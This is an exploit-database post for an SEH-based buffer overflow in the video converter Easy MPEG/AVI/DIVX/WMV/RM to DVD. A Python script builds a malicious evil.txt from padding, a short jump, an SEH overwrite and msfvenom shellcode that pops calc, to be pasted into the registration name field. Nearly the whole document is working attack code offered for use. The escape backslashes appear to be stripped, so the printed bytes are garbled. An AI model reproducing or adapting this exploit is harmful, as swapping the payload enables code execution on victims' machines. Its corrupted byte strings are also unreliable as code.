Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow
Posted on 25 October 2017
#!/usr/bin/python ############################################################################### # Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH) # Date: 05-10-2017 # Exploit Author: Venkat Rajgor # Vendor Homepage: http://www.divxtodvd.net/ # Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe # Tested On: Windows 7 x64 # # # To reproduce the exploit: # 1. Click Register # 2. In the "Enter User Name" field, paste the content of evil.txt # ############################################################################## filename="evil.txt" buffer = "x41" * 1008 #Buffer nSEH = "xEBx06x90x90" #short Jump SEH = "x59x78x03x10" #SEH badchars = "x00x0Ax0Dx1A" # Bad Chars # msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f c # Payload To Pop Calc shell=( "xbaxf5xedx50xfaxdbxdexd9x74x24xf4x5ex29xc9xb1" "x31x31x56x13x83xc6x04x03x56xfax0fxa5x06xecx52" "x46xf7xecx32xcex12xddx72xb4x57x4dx43xbex3ax61" "x28x92xaexf2x5cx3bxc0xb3xebx1dxefx44x47x5dx6e" "xc6x9axb2x50xf7x54xc7x91x30x88x2axc3xe9xc6x99" "xf4x9ex93x21x7execx32x22x63xa4x35x03x32xbfx6f" "x83xb4x6cx04x8axaex71x21x44x44x41xddx57x8cx98" "x1exfbxf1x15xedx05x35x91x0ex70x4fxe2xb3x83x94" "x99x6fx01x0fx39xfbxb1xebxb8x28x27x7fxb6x85x23" "x27xdax18xe7x53xe6x91x06xb4x6fxe1x2cx10x34xb1" "x4dx01x90x14x71x51x7bxc8xd7x19x91x1dx6ax40xff" "xe0xf8xfex4dxe2x02x01xe1x8bx33x8ax6excbxcbx59" "xcbx23x86xc0x7dxacx4fx91x3cxb1x6fx4fx02xccxf3" "x7axfax2bxebx0exffx70xabxe3x8dxe9x5ex04x22x09" "x4bx67xa5x99x17x46x40x1axbdx96") evil = "x90"*20 + shell buffer = "A"*1008 + "xEBx06x90x90"+ "x59x78x03x10" + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
